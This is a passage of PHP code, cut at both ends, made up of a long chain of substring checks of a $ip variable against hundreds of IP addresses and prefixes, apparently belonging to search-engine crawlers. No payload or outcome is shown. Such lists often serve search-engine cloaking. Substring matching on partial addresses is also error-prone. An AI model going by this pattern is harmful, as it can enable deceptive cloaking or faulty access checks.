stripos($ip, '216.239.51.98') !== false ||
stripos($ip, '216.239.51.99') !== false ||
stripos($ip, '216.239.53.98') !== false ||
stripos($ip, '216.239.53.99') !== false ||
stripos($ip, '216.239.57.96') !== false ||
stripos($ip, '216.239.57.97') !== false ||
stripos($ip, '216.239.57.98') !== false ||
stripos($ip, '216.239.57.99') !== false ||
stripos($ip, '216.239.59.98') !== false ||
stripos($ip, '216.239.59.99') !== false ||
stripos($ip, '216.33.229.163') !== false ||
stripos($ip, '64.233.173.193') !== false ||
stripos($ip, '64.233.173.194') !== false ||
stripos($ip, '64.233.173.195') !== false ||
stripos($ip, '64.233.173.196') !== false ||
stripos($ip, '64.233.173.197') !== false ||
stripos($ip, '64.233.173.198') !== false ||
stripos($ip, '64.233.173.199') !== false ||
stripos($ip, '64.233.173.200') !== false ||
stripos($ip, '64.233.173.201') !== false ||
stripos($ip, '64.233.173.202') !== false ||
stripos($ip, '64.233.173.203') !== false ||
stripos($ip, '64.233.173.204') !== false ||
stripos($ip, '64.233.173.205') !== false ||
stripos($ip, '64.233.173.206') !== false ||
stripos($ip, '64.233.173.207') !== false ||
stripos($ip, '64.233.173.208') !== false ||
stripos($ip, '64.233.173.209') !== false ||
stripos($ip, '64.233.173.210') !== false ||
stripos($ip, '64.233.173.211') !== false ||
stripos($ip, '64.233.173.212') !== false ||
stripos($ip, '64.233.173.213') !== false ||
stripos($ip, '64.233.173.214') !== false ||
stripos($ip, '64.233.173.215') !== false ||
stripos($ip, '64.233.173.216') !== false ||
stripos($ip, '64.233.173.217') !== false ||
stripos($ip, '64.233.173.218') !== false ||
stripos($ip, '64.233.173.219') !== false ||
stripos($ip, '64.233.173.220') !== false ||
stripos($ip, '64.233.173.221') !== false ||
stripos($ip, '64.233.173.222') !== false ||
stripos($ip, '64.233.173.223') !== false ||
stripos($ip, '64.233.173.224') !== false ||
stripos($ip, '64.233.173.225') !== false ||
stripos($ip, '64.233.173.226') !== false ||
stripos($ip, '64.233.173.227') !== false ||
stripos($ip, '64.233.173.228') !== false ||
stripos($ip, '64.233.173.229') !== false ||
stripos($ip, '64.233.173.230') !== false ||
stripos($ip, '64.233.173.231') !== false ||
stripos($ip, '64.233.173.232') !== false ||
stripos($ip, '64.233.173.233') !== false ||
stripos($ip, '64.233.173.234') !== false ||
stripos($ip, '64.233.173.235') !== false ||
stripos($ip, '64.233.173.236') !== false ||
stripos($ip, '64.233.173.237') !== false ||
stripos($ip, '64.233.173.238') !== false ||
stripos($ip, '64.233.173.239') !== false ||
stripos($ip, '64.233.173.240') !== false ||
stripos($ip, '64.233.173.241') !== false ||
stripos($ip, '64.233.173.242') !== false ||
stripos($ip, '64.233.173.243') !== false ||
stripos($ip, '64.233.173.244') !== false ||
stripos($ip, '64.233.173.245') !== false ||
stripos($ip, '64.233.173.246') !== false ||
stripos($ip, '64.233.173.247') !== false ||
stripos($ip, '64.233.173.248') !== false ||
stripos($ip, '64.233.173.249') !== false ||
stripos($ip, '64.233.173.250') !== false ||
stripos($ip, '64.233.173.251') !== false ||
stripos($ip, '64.233.173.252') !== false ||
stripos($ip, '64.233.173.253') !== false ||
stripos($ip, '64.233.173.254') !== false ||
stripos($ip, '64.233.173.255') !== false ||
stripos($ip, '64.68.80') !== false ||
stripos($ip, '64.68.81') !== false ||
stripos($ip, '64.68.82') !== false ||
stripos($ip, '64.68.83') !== false ||
stripos($ip, '64.68.84') !== false ||
stripos($ip, '64.68.85') !== false ||
stripos($ip, '64.68.86') !== false ||
stripos($ip, '64.68.87') !== false ||
stripos($ip, '64.68.88') !== false ||
stripos($ip, '64.68.89') !== false ||
stripos($ip, '64.68.90.1') !== false ||
stripos($ip, '64.68.90.10') !== false ||
stripos($ip, '64.68.90.11') !== false ||
stripos($ip, '64.68.90.12') !== false ||
stripos($ip, '64.68.90.129') !== false ||
stripos($ip, '64.68.90.13') !== false ||
stripos($ip, '64.68.90.130') !== false ||
stripos($ip, '64.68.90.131') !== false ||
stripos($ip, '64.68.90.132') !== false ||
stripos($ip, '64.68.90.133') !== false ||
stripos($ip, '64.68.90.134') !== false ||
stripos($ip, '64.68.90.135') !== false ||
stripos($ip, '64.68.90.136') !== false ||
stripos($ip, '64.68.90.137') !== false ||
stripos($ip, '64.68.90.138') !== false ||
stripos($ip, '64.68.90.139') !== false ||
stripos($ip, '64.68.90.14') !== false ||
stripos($ip, '64.68.90.140') !== false ||
stripos($ip, '64.68.90.141') !== false ||
stripos($ip, '64.68.90.142') !== false ||
stripos($ip, '64.68.90.143') !== false ||
stripos($ip, '64.68.90.144') !== false ||
stripos($ip, '64.68.90.145') !== false ||
stripos($ip, '64.68.90.146') !== false ||
stripos($ip, '64.68.90.147') !== false ||
stripos($ip, '64.68.90.148') !== false ||
stripos($ip, '64.68.90.149') !== false ||
stripos($ip, '64.68.90.15') !== false ||
stripos($ip, '64.68.90.150') !== false ||
stripos($ip, '64.68.90.151') !== false ||
stripos($ip, '64.68.90.152') !== false ||
stripos($ip, '64.68.90.153') !== false ||
stripos($ip, '64.68.90.154') !== false ||
stripos($ip, '64.68.90.155') !== false ||
stripos($ip, '64.68.90.156') !== false ||
stripos($ip, '64.68.90.157') !== false ||
stripos($ip, '64.68.90.158') !== false ||
stripos($ip, '64.68.90.159') !== false ||
stripos($ip, '64.68.90.16') !== false ||
stripos($ip, '64.68.90.160') !== false ||
stripos($ip, '64.68.90.161') !== false ||
stripos($ip, '64.68.90.162') !== false ||
stripos($ip, '64.68.90.163') !== false ||
stripos($ip, '64.68.90.164') !== false ||
stripos($ip, '64.68.90.165') !== false ||
stripos($ip, '64.68.90.166') !== false ||
stripos($ip, '64.68.90.167') !== false ||
stripos($ip, '64.68.90.168') !== false ||
stripos($ip, '64.68.90.169') !== false ||
stripos($ip, '64.68.90.17') !== false ||
stripos($ip, '64.68.90.170') !== false ||
stripos($ip, '64.68.90.171') !== false ||
stripos($ip, '64.68.90.172') !== false ||
stripos($ip, '64.68.90.173') !== false ||
stripos($ip, '64.68.90.174') !== false ||
stripos($ip, '64.68.90.175') !== false ||
stripos($ip, '64.68.90.176') !== false ||
stripos($ip, '64.68.90.177') !== false ||
stripos($ip, '64.68.90.178') !== false ||
stripos($ip, '64.68.90.179') !== false ||
stripos($ip, '64.68.90.18') !== false ||
stripos($ip, '64.68.90.180') !== false ||
stripos($ip, '64.68.90.181') !== false ||
stripos($ip, '64.68.90.182') !== false ||
stripos($ip, '64.68.90.183') !== false ||
stripos($ip, '64.68.90.184') !== false ||
stripos($ip, '64.68.90.185') !== false ||
stripos($ip, '64.68.90.186') !== false ||
stripos($ip, '64.68.90.187') !== false ||
stripos($ip, '64.68.90.188') !== false ||
stripos($ip, '64.68.90.189') !== false ||
stripos($ip, '64.68.90.19') !== false ||
stripos($ip, '64.68.90.190') !== false ||
stripos($ip, '64.68.90.191') !== false ||
stripos($ip, '64.68.90.192') !== false ||
stripos($ip, '64.68.90.193') !== false ||
stripos($ip, '64.68.90.194') !== false ||
stripos($ip, '64.68.90.195') !== false ||
stripos($ip, '64.68.90.196') !== false ||
stripos($ip, '64.68.90.197') !== false ||
stripos($ip, '64.68.90.198') !== false ||
stripos($ip, '64.68.90.199') !== false ||
stripos($ip, '64.68.90.2') !== false ||
stripos($ip, '64.68.90.20') !== false ||
stripos($ip, '64.68.90.200') !== false ||
stripos($ip, '64.68.90.201') !== false ||
stripos($ip, '64.68.90.202') !== false ||
stripos($ip, '64.68.90.203') !== false ||
stripos($ip, '64.68.90.204') !== false ||
stripos($ip, '64.68.90.205') !== false ||
stripos($ip, '64.68.90.206') !== false ||
stripos($ip, '64.68.90.207') !== false ||
stripos($ip, '64.68.90.208') !== false ||
stripos($ip, '64.68.90.21') !== false ||
stripos($ip, '64.68.90.22') !== false ||
stripos($ip, '64.68.90.23') !== false ||
stripos($ip, '64.68.90.24') !== false ||
stripos($ip, '64.68.90.25') !== false ||
stripos($ip, '64.68.90.26') !== false ||
stripos($ip, '64.68.90.27') !== false ||
stripos($ip, '64.68.90.28') !== false ||
stripos($ip, '64.68.90.29') !== false ||
stripos($ip, '64.68.90.3') !== false ||
stripos($ip, '64.68.90.30') !== false ||
stripos($ip, '64.68.90.31') !== false ||
stripos($ip, '64.68.90.32') !== false ||
stripos($ip, '64.68.90.33') !== false ||
stripos($ip, '64.68.90.34') !== false ||
stripos($ip, '64.68.90.35') !== false ||
stripos($ip, '64.68.90.36') !== false ||
stripos($ip, '64.68.90.37') !== false ||
stripos($ip, '64.68.90.38') !== false ||
stripos($ip, '64.68.90.39') !== false ||
stripos($ip, '64.68.90.4') !== false ||
stripos($ip, '64.68.90.40') !== false ||
stripos($ip, '64.68.90.41') !== false ||
stripos($ip, '64.68.90.42') !== false ||
stripos($ip, '64.68.90.43') !== false ||
stripos($ip, '64.68.90.44') !== false ||
stripos($ip, '64.68.90.45') !== false ||
stripos($ip, '64.68.90.46') !== false ||
stripos($ip, '64.68.90.47') !== false ||
stripos($ip, '64.68.90.48') !== false ||
stripos($ip, '64.68.90.49') !== false ||
stripos($ip, '64.68.90.5') !== false ||
stripos($ip, '64.68.90.50') !== false ||
stripos($ip, '64.68.90.51') !== false ||
stripos($ip, '64.68.90.52') !== false ||
stripos($ip, '64.68.90.53') !== false ||
stripos($ip, '64.68.90.54') !== false ||
stripos($ip, '64.68.90.55') !== false ||
stripos($ip, '64.68.90.56') !== false ||
stripos($ip, '64.68.90.57') !== false ||
stripos($ip, '64.68.90.58') !== false ||
stripos($ip, '64.68.90.59') !== false ||
stripos($ip, '64.68.90.6') !== false ||
stripos($ip, '64.68.90.60') !== false ||
stripos($ip, '64.68.90.61') !== false ||
stripos($ip, '64.68.90.62') !== false ||
stripos($ip, '64.68.90.63') !== false ||
stripos($ip, '64.68.90.64') !== false ||
stripos($ip, '64.68.90.65') !== false ||
stripos($ip, '64.68.90.66') !== false ||
stripos($ip, '64.68.90.67') !== false ||
stripos($ip, '64.68.90.68') !== false ||
stripos($ip, '64.68.90.69') !== false ||
stripos($ip, '64.68.90.7') !== false ||
stripos($ip, '64.68.90.70') !== false ||
stripos($ip, '64.68.90.71') !== false ||
stripos($ip, '64.68.90.72') !== false ||
stripos($ip, '64.68.90.73') !== false ||
stripos($ip, '64.68.90.74') !== false ||
stripos($ip, '64.68.90.75') !== false ||
stripos($ip, '64.68.90.76') !== false ||
stripos($ip, '64.68.90.77') !== false ||
stripos($ip, '64.68.90.78') !== false ||
stripos($ip, '64.68.90.79') !== false ||
stripos($ip, '64.68.90.8') !== false ||
stripos($ip, '64.68.90.80') !== false ||
stripos($ip, '64.68.90.9') !== false ||
stripos($ip, '64.68.91') !== false ||
stripos($ip, '64.68.92') !== false ||
stripos($ip, '66.249.64') !== false ||
stripos($ip, '66.249.65') !== false ||
stripos($ip, '66.249.66') !== false ||
stripos($ip, '66.249.67') !== false ||
stripos($ip, '66.249.68') !== false ||
stripos($ip, '66.249.69') !== false ||
stripos($ip, '66.249.70') !== false ||
stripos($ip, '66.249.71') !== false ||
stripos($ip, '66.249.72') !== false ||
stripos($ip, '66.249.73') !== false ||
stripos($ip, '66.249.78') !== false ||
stripos($ip, '66.249.79') !== false ||
stripos($ip, '72.14.199') !== false ||
stripos($ip, '8.6.48') !== false ||
stripos($ip, '141.185.209') !== false ||
stripos($ip, '169.207.238') !== false ||
stripos($ip, '199.177.18.9') !== false ||
stripos($ip, '202.160.178') !== false ||
stripos($ip, '202.160.179') !== false ||
stripos($ip, '202.160.180') !== false ||
stripos($ip, '202.160.181') !== false ||
stripos($ip, '202.160.183.182') !== false ||
stripos($ip, '202.160.183.217') !== false ||
stripos($ip, '202.160.183.218') !== false ||
stripos($ip, '202.160.183.219') !== false ||
stripos($ip, '202.160.183.220') !== false ||
stripos($ip, '202.160.183.235') !== false ||
stripos($ip, '202.160.183.239') !== false ||
stripos($ip, '202.160.183.245') !== false ||
stripos($ip, '202.160.185.174') !== false ||
stripos($ip, '202.165.96.142') !== false ||
stripos($ip, '202.165.98') !== false ||
stripos($ip, '202.165.99') !== false ||
stripos($ip, '202.212.5.30') !== false ||
stripos($ip, '202.212.5.32') !== false ||
stripos($ip, '202.212.5.33') !== false ||
stripos($ip, '202.212.5.34') !== false ||
stripos($ip, '202.212.5.35') !== false ||
stripos($ip, '202.212.5.36') !== false ||
stripos($ip, '202.212.5.37') !== false ||
stripos($ip, '202.212.5.38') !== false ||
stripos($ip, '202.212.5.39') !== false ||
stripos($ip, '202.212.5.47') !== false ||
stripos($ip, '202.212.5.48') !== false ||
stripos($ip, '202.46.19.93') !== false ||
stripos($ip, '203.123.188.2') !== false ||
stripos($ip, '203.141.52.41') !== false ||
stripos($ip, '203.141.52.42') !== false ||
stripos($ip, '203.141.52.43') !== false ||
stripos($ip, '203.141.52.44') !== false ||
stripos($ip, '203.141.52.45') !== false ||
stripos($ip, '203.141.52.46') !== false ||
stripos($ip, '203.141.52.47') !== false ||
stripos($ip, '203.255.234.102') !== false ||
stripos($ip, '203.255.234.103') !== false ||
stripos($ip, '203.255.234.105') !== false ||
stripos($ip, '203.255.234.106') !== false ||
stripos($ip, '206.190.43.125') !== false ||
stripos($ip, '206.190.43.81') !== false ||
stripos($ip, '207.126.239.224') !== false ||
stripos($ip, '209.1.12') !== false ||
stripos($ip, '209.1.13.101') !== false ||
stripos($ip, '209.1.13.231') !== false ||
stripos($ip, '209.1.13.232') !== false ||
stripos($ip, '209.1.32.122') !== false ||
stripos($ip, '209.1.38') !== false ||
stripos($ip, '209.131.40') !== false ||
stripos($ip, '209.131.41') !== false ||
stripos($ip, '209.131.48') !== false ||
stripos($ip, '209.131.49.37') !== false ||
stripos($ip, '209.131.50.153') !== false ||
stripos($ip, '209.131.51.166') !== false ||
stripos($ip, '209.131.60.169') !== false ||
stripos($ip, '209.131.60.170') !== false ||
stripos($ip, '209.131.60.171') !== false ||
stripos($ip, '209.131.60.19') !== false ||
stripos($ip, '209.131.62.107') !== false ||
stripos($ip, '209.131.62.108') !== false ||
stripos($ip, '209.131.62.109') !== false ||
stripos($ip, '209.131.62.214') !== false ||
stripos($ip, '209.185.122') !== false ||
stripos($ip, '209.185.141') !== false ||
stripos($ip, '209.185.143') !== false ||
stripos($ip, '209.191.123.33') !== false ||
stripos($ip, '209.191.64.227') !== false ||
stripos($ip, '209.191.65') !== false ||
stripos($ip, '209.191.65.249') !== false ||
stripos($ip, '209.191.65.82') !== false ||
stripos($ip, '209.191.82.245') !== false ||
stripos($ip, '209.191.82.252') !== false ||
stripos($ip, '209.191.83') !== false ||
stripos($ip, '209.191.83.220') !== false ||
stripos($ip, '209.191.87.215') !== false ||
stripos($ip, '209.191.87.216') !== false ||
stripos($ip, '209.191.87.217') !== false ||
stripos($ip, '209.191.87.218') !== false ||
stripos($ip, '209.191.87.219') !== false ||
stripos($ip, '209.191.87.220') !== false ||
stripos($ip, '209.191.87.221') !== false ||
stripos($ip, '209.191.87.222') !== false ||
stripos($ip, '209.191.87.223') !== false ||
stripos($ip, '209.67.206.126') !== false ||
stripos($ip, '209.67.206.127') !== false ||
stripos($ip, '209.67.206.133') !== false ||
stripos($ip, '209.73.176.128') !== false ||
stripos($ip, '209.73.176.129') !== false ||
stripos($ip, '209.73.176.133') !== false ||
stripos($ip, '209.73.176.134') !== false ||
stripos($ip, '209.73.176.136') !== false ||
stripos($ip, '211.14.8.240') !== false ||
stripos($ip, '211.169.241.21') !== false ||
stripos($ip, '213.216.143.37') !== false ||
stripos($ip, '213.216.143.38') !== false ||
stripos($ip, '213.216.143.39') !== false ||
stripos($ip, '216.109.121.70') !== false ||
stripos($ip, '216.109.121.71') !== false ||
stripos($ip, '216.109.126.131') !== false ||
stripos($ip, '216.109.126.133') !== false ||
stripos($ip, '216.109.126.137') !== false ||
stripos($ip, '216.109.126.138') !== false ||
stripos($ip, '216.109.126.139') !== false ||
stripos($ip, '216.109.126.141') !== false ||
stripos($ip, '216.109.126.143') !== false ||
stripos($ip, '216.109.126.145') !== false ||
stripos($ip, '216.109.126.146') !== false ||
stripos($ip, '216.109.126.147') !== false ||
stripos($ip, '216.109.126.150') !== false ||
stripos($ip, '216.109.126.152') !== false ||
stripos($ip, '216.109.126.157') !== false ||
stripos($ip, '216.109.126.158') !== false ||
stripos($ip, '216.109.126.159') !== false ||
stripos($ip, '216.109.126.160') !== false ||
stripos($ip, '216.109.126.161') !== false ||
stripos($ip, '216.136.233.164') !== false ||
stripos($ip, '216.145.58.219') !== false ||
stripos($ip, '216.155.198.60') !== false ||
stripos($ip, '216.155.200') !== false ||
stripos($ip, '216.155.202.175') !== false ||
stripos($ip, '216.155.202.54') !== false ||
stripos($ip, '216.155.204.40') !== false ||
stripos($ip, '216.239.193.71') !== false ||
stripos($ip, '216.239.193.72') !== false ||
stripos($ip, '216.239.193.73') !== false ||
stripos($ip, '216.239.193.74') !== false ||
stripos($ip, '216.239.193.75') !== false ||
stripos($ip, '216.239.193.76') !== false ||
stripos($ip, '216.239.193.77') !== false ||
stripos($ip, '216.239.193.78') !== false ||
stripos($ip, '216.239.193.79') !== false ||
stripos($ip, '216.239.193.80') !== false ||
stripos($ip, '216.239.193.81') !== false ||
stripos($ip, '216.239.193.82') !== false ||
stripos($ip, '216.239.193.83') !== false ||
stripos($ip, '216.239.193.84') !== false ||
stripos($ip, '216.239.193.85') !== false ||
stripos($ip, '216.239.193.86') !== false ||
stripos($ip, '216.32.237.1') !== false ||
stripos($ip, '216.32.237.10') !== false ||
stripos($ip, '216.32.237.11') !== false ||
stripos($ip, '216.32.237.12') !== false ||
stripos($ip, '216.32.237.13') !== false ||
stripos($ip, '216.32.237.14') !== false ||
stripos($ip, '216.32.237.15') !== false ||
stripos($ip, '216.32.237.16') !== false ||
stripos($ip, '216.32.237.17') !== false ||
stripos($ip, '216.32.237.18') !== false ||
stripos($ip, '216.32.237.19') !== false ||
stripos($ip, '216.32.237.20') !== false ||
stripos($ip, '216.32.237.21') !== false ||
stripos($ip, '216.32.237.22') !== false ||
stripos($ip, '216.32.237.23') !== false ||
stripos($ip, '216.32.237.24') !== false ||
stripos($ip, '216.32.237.25') !== false ||
stripos($ip, '216.32.237.26') !== false ||
stripos($ip, '216.32.237.27') !== false ||
stripos($ip, '216.32.237.28') !== false ||
stripos($ip, '216.32.237.29') !== false ||
stripos($ip, '216.32.237.30') !== false ||
stripos($ip, '216.32.237.7') !== false ||
stripos($ip, '216.32.237.8') !== false ||
stripos($ip, '216.32.237.9') !== false ||
stripos($ip, '62.172.199.20') !== false ||
stripos($ip, '62.172.199.21') !== false ||
stripos($ip, '62.172.199.22') !== false ||
stripos($ip, '62.172.199.23') !== false ||
stripos($ip, '62.172.199.24') !== false ||
stripos($ip, '62.27.59.245') !== false ||
stripos($ip, '63.163.102.180') !== false ||
stripos($ip, '63.163.102.181') !== false ||
stripos($ip, '63.163.102.182') !== false ||
stripos($ip, '64.157.137.219') !== false ||
stripos($ip, '64.157.137.220') !== false ||
stripos($ip, '64.157.137.221') !== false ||
stripos($ip, '64.157.137.225') !== false ||
stripos($ip, '64.157.138.103') !== false ||
stripos($ip, '64.157.138.108') !== false ||
stripos($ip, '64.75.36.42') !== false ||
stripos($ip, '64.75.36.43') !== false ||
stripos($ip, '64.75.36.44') !== false ||
stripos($ip, '64.75.36.45') !== false ||
stripos($ip, '64.75.36.47') !== false ||
stripos($ip, '64.75.36.77') !== false ||
stripos($ip, '64.75.36.79') !== false ||
stripos($ip, '64.75.36.80') !== false ||
stripos($ip, '66.163.170.157') !== false ||
stripos($ip, '66.163.170.159') !== false ||
stripos($ip, '66.163.170.161') !== false ||
stripos($ip, '66.163.170.162') !== false ||
stripos($ip, '66.163.170.166') !== false ||
stripos($ip, '66.163.170.167') !== false ||
stripos($ip, '66.163.170.170') !== false ||
stripos($ip, '66.163.170.172') !== false ||
stripos($ip, '66.163.170.176') !== false ||
stripos($ip, '66.163.170.178') !== false ||
stripos($ip, '66.163.170.179') !== false ||
stripos($ip, '66.163.170.180') !== false ||
stripos($ip, '66.163.170.184') !== false ||
stripos($ip, '66.163.170.185') !== false ||
stripos($ip, '66.163.170.190') !== false ||
stripos($ip, '66.163.170.192') !== false ||
stripos($ip, '66.163.174.65') !== false ||
stripos($ip, '66.196.101') !== false ||
stripos($ip, '66.196.65') !== false ||
stripos($ip, '66.196.67.100') !== false ||
stripos($ip, '66.196.67.101') !== false ||
stripos($ip, '66.196.67.102') !== false ||
stripos($ip, '66.196.67.103') !== false ||
stripos($ip, '66.196.67.104') !== false ||
stripos($ip, '66.196.67.105') !== false ||
stripos($ip, '66.196.67.106') !== false ||
stripos($ip, '66.196.67.107') !== false ||
stripos($ip, '66.196.67.108') !== false ||
stripos($ip, '66.196.67.109') !== false ||
stripos($ip, '66.196.67.110') !== false ||
stripos($ip, '66.196.67.111') !== false ||
stripos($ip, '66.196.67.112') !== false ||
stripos($ip, '66.196.67.113') !== false ||
stripos($ip, '66.196.67.114') !== false ||
stripos($ip, '66.196.67.115') !== false ||
stripos($ip, '66.196.67.116') !== false ||
stripos($ip, '66.196.67.117') !== false ||
stripos($ip, '66.196.67.118') !== false ||
stripos($ip, '66.196.67.119') !== false ||
stripos($ip, '66.196.67.120') !== false ||
stripos($ip, '66.196.67.121') !== false ||
stripos($ip, '66.196.67.122') !== false ||
stripos($ip, '66.196.67.123') !== false ||
stripos($ip, '66.196.67.124') !== false ||
stripos($ip, '66.196.67.125') !== false ||
stripos($ip, '66.196.67.126') !== false ||
stripos($ip, '66.196.67.127') !== false ||
stripos($ip, '66.196.67.128') !== false ||
stripos($ip, '66.196.67.129') !== false ||
stripos($ip, '66.196.67.130') !== false ||
stripos($ip, '66.196.67.150') !== false ||
stripos($ip, '66.196.67.151') !== false ||
stripos($ip, '66.196.67.176') !== false ||
stripos($ip, '66.196.67.177') !== false ||
stripos($ip, '66.196.67.178') !== false ||
stripos($ip, '66.196.67.200') !== false ||
stripos($ip, '66.196.67.201') !== false ||
stripos($ip, '66.196.67.202') !== false ||
stripos($ip, '66.196.67.203') !== false ||
stripos($ip, '66.196.67.204') !== false ||
stripos($ip, '66.196.67.205') !== false ||
stripos($ip, '66.196.67.206') !== false ||
stripos($ip, '66.196.67.207') !== false ||
stripos($ip, '66.196.67.208') !== false ||
stripos($ip, '66.196.67.209') !== false ||
stripos($ip, '66.196.67.210') !== false ||
stripos($ip, '66.196.67.211') !== false ||
stripos($ip, '66.196.67.212') !== false ||
stripos($ip, '66.196.67.213') !== false ||
stripos($ip, '66.196.67.214') !== false ||
stripos($ip, '66.196.67.215') !== false ||
stripos($ip, '66.196.67.216') !== false ||
stripos($ip, '66.196.67.217') !== false ||
stripos($ip, '66.196.67.218') !== false ||
stripos($ip, '66.196.67.219') !== false ||
stripos($ip, '66.196.67.220') !== false ||
stripos($ip, '66.196.67.221') !== false ||
stripos($ip, '66.196.67.222') !== false ||
stripos($ip, '66.196.67.223') !== false ||
stripos($ip, '66.196.67.224') !== false ||
stripos($ip, '66.196.67.225') !== false ||
stripos($ip, '66.196.67.226') !== false ||
stripos($ip, '66.196.67.227') !== false ||
stripos($ip, '66.196.67.228') !== false ||
stripos($ip, '66.196.67.229') !== false ||
stripos($ip, '66.196.67.230') !== false ||
stripos($ip, '66.196.67.231') !== false ||
stripos($ip, '66.196.67.232') !== false ||
stripos($ip, '66.196.67.233') !== false ||
stripos($ip, '66.196.67.234') !== false ||
stripos($ip, '66.196.67.235') !== false ||
stripos($ip, '66.196.67.236') !== false ||
stripos($ip, '66.196.67.237') !== false ||
stripos($ip, '66.196.67.238') !== false ||
stripos($ip, '66.196.67.239') !== false ||
stripos($ip, '66.196.67.240') !== false ||
stripos($ip, '66.196.67.254') !== false ||
stripos($ip, '66.196.67.30') !== false ||
stripos($ip, '66.196.67.31') !== false ||
stripos($ip, '66.196.67.32') !== false ||
stripos($ip, '66.196.67.33') !== false ||
stripos($ip, '66.196.67.34') !== false ||
stripos($ip, '66.196.67.35') !== false ||
stripos($ip, '66.196.67.36') !== false ||
stripos($ip, '66.196.67.37') !== false ||
stripos($ip, '66.196.67.38') !== false ||
stripos($ip, '66.196.67.39') !== false ||
stripos($ip, '66.196.67.70') !== false ||
stripos($ip, '66.196.67.71') !== false ||
stripos($ip, '66.196.67.72') !== false ||
stripos($ip, '66.196.67.73') !== false ||
stripos($ip, '66.196.67.74') !== false ||
stripos($ip, '66.196.67.75') !== false ||
stripos($ip, '66.196.67.76') !== false ||
stripos($ip, '66.196.67.77') !== false ||
stripos($ip, '66.196.67.78') !== false ||
stripos($ip, '66.196.67.79') !== false ||
stripos($ip, '66.196.67.80') !== false ||
stripos($ip, '66.196.67.94') !== false ||
stripos($ip, '66.196.67.95') !== false ||
stripos($ip, '66.196.67.96') !== false ||
stripos($ip, '66.196.67.97') !== false ||
stripos($ip, '66.196.67.98') !== false ||
stripos($ip, '66.196.67.99') !== false ||
stripos($ip, '66.196.72') !== false ||
stripos($ip, '66.196.73') !== false ||
stripos($ip, '66.196.74') !== false ||
stripos($ip, '66.196.77') !== false ||
stripos($ip, '66.196.78') !== false ||
stripos($ip, '66.196.80') !== false ||
stripos($ip, '66.196.81.10') !== false ||
stripos($ip, '66.196.81.102') !== false ||
stripos($ip, '66.196.81.103') !== false ||
stripos($ip, '66.196.81.104') !== false ||
stripos($ip, '66.196.81.105') !== false ||
stripos($ip, '66.196.81.106') !== false ||
stripos($ip, '66.196.81.107') !== false ||
stripos($ip, '66.196.81.108') !== false ||
stripos($ip, '66.196.81.109') !== false ||
stripos($ip, '66.196.81.11') !== false ||
stripos($ip, '66.196.81.110') !== false ||
stripos($ip, '66.196.81.111') !== false ||
stripos($ip, '66.196.81.112') !== false ||
stripos($ip, '66.196.81.113') !== false ||
stripos($ip, '66.196.81.114') !== false ||
stripos($ip, '66.196.81.115') !== false ||
stripos($ip, '66.196.81.116') !== false ||
stripos($ip, '66.196.81.117') !== false ||
stripos($ip, '66.196.81.118') !== false ||
stripos($ip, '66.196.81.119') !== false ||
stripos($ip, '66.196.81.12') !== false ||
stripos($ip, '66.196.81.120') !== false ||
stripos($ip, '66.196.81.121') !== false ||
stripos($ip, '66.196.81.122') !== false ||
stripos($ip, '66.196.81.123') !== false ||
stripos($ip, '66.196.81.124') !== false ||
stripos($ip, '66.196.81.125') !== false ||
stripos($ip, '66.196.81.126') !== false ||
stripos($ip, '66.196.81.127') !== false ||
stripos($ip, '66.196.81.128') !== false ||
stripos($ip, '66.196.81.129') !== false ||
stripos($ip, '66.196.81.13') !== false ||
stripos($ip, '66.196.81.130') !== false ||
stripos($ip, '66.196.81.131') !== false ||
stripos($ip, '66.196.81.132') !== false ||
stripos($ip, '66.196.81.133') !== false ||
stripos($ip, '66.196.81.134') !== false ||
stripos($ip, '66.196.81.135') !== false ||
stripos($ip, '66.196.81.136') !== false ||
stripos($ip, '66.196.81.137') !== false ||
stripos($ip, '66.196.81.138') !== false ||
stripos($ip, '66.196.81.139') !== false ||
stripos($ip, '66.196.81.14') !== false ||
stripos($ip, '66.196.81.140') !== false ||
stripos($ip, '66.196.81.141') !== false ||
stripos($ip, '66.196.81.142') !== false ||
stripos($ip, '66.196.81.143') !== false ||
stripos($ip, '66.196.81.144') !== false ||
stripos($ip, '66.196.81.145') !== false ||
stripos($ip, '66.196.81.146') !== false ||
stripos($ip, '66.196.81.147') !== false ||
stripos($ip, '66.196.81.148') !== false ||
stripos($ip, '66.196.81.149') !== false ||
stripos($ip, '66.196.81.15') !== false ||
stripos($ip, '66.196.81.150') !== false ||
stripos($ip, '66.196.81.151') !== false ||
stripos($ip, '66.196.81.152') !== false ||
stripos($ip, '66.196.81.153') !== false ||
stripos($ip, '66.196.81.154') !== false ||
stripos($ip, '66.196.81.155') !== false ||
stripos($ip, '66.196.81.156') !== false ||
stripos($ip, '66.196.81.157') !== false ||
stripos($ip, '66.196.81.158') !== false ||
stripos($ip, '66.196.81.159') !== false ||
stripos($ip, '66.196.81.16') !== false ||
stripos($ip, '66.196.81.160') !== false ||
stripos($ip, '66.196.81.161') !== false ||
stripos($ip, '66.196.81.162') !== false ||
stripos($ip, '66.196.81.163') !== false ||
stripos($ip, '66.196.81.164') !== false ||
stripos($ip, '66.196.81.165') !== false ||
stripos($ip, '66.196.81.166') !== false ||
stripos($ip, '66.196.81.167') !== false ||
stripos($ip, '66.196.81.168') !== false ||
stripos($ip, '66.196.81.169') !== false ||
stripos($ip, '66.196.81.17') !== false ||
stripos($ip, '66.196.81.170') !== false ||
stripos($ip, '66.196.81.171') !== false ||
stripos($ip, '66.196.81.172') !== false ||
stripos($ip, '66.196.81.173') !== false ||
stripos($ip, '66.196.81.174') !== false ||
stripos($ip, '66.196.81.175') !== false ||
stripos($ip, '66.196.81.176') !== false ||
stripos($ip, '66.196.81.177') !== false ||
stripos($ip, '66.196.81.178') !== false ||
stripos($ip, '66.196.81.179') !== false ||
stripos($ip, '66.196.81.18') !== false ||
stripos($ip, '66.196.81.180') !== false ||
stripos($ip, '66.196.81.181') !== false ||
stripos($ip, '66.196.81.182') !== false ||
stripos($ip, '66.196.81.183') !== false ||
stripos($ip, '66.196.81.184') !== false ||
stripos($ip, '66.196.81.185') !== false ||
stripos($ip, '66.196.81.187') !== false ||
stripos($ip, '66.196.81.188') !== false ||
stripos($ip, '66.196.81.189') !== false ||
stripos($ip, '66.196.81.19') !== false ||
stripos($ip, '66.196.81.190') !== false ||
stripos($ip, '66.196.81.191') !== false ||
stripos($ip, '66.196.81.192') !== false ||
stripos($ip, '66.196.81.193') !== false ||
stripos($ip, '66.196.81.194') !== false ||
stripos($ip, '66.196.81.195') !== false ||
stripos($ip, '66.196.81.196') !== false ||
stripos($ip, '66.196.81.197') !== false ||
stripos($ip, '66.196.81.198') !== false ||
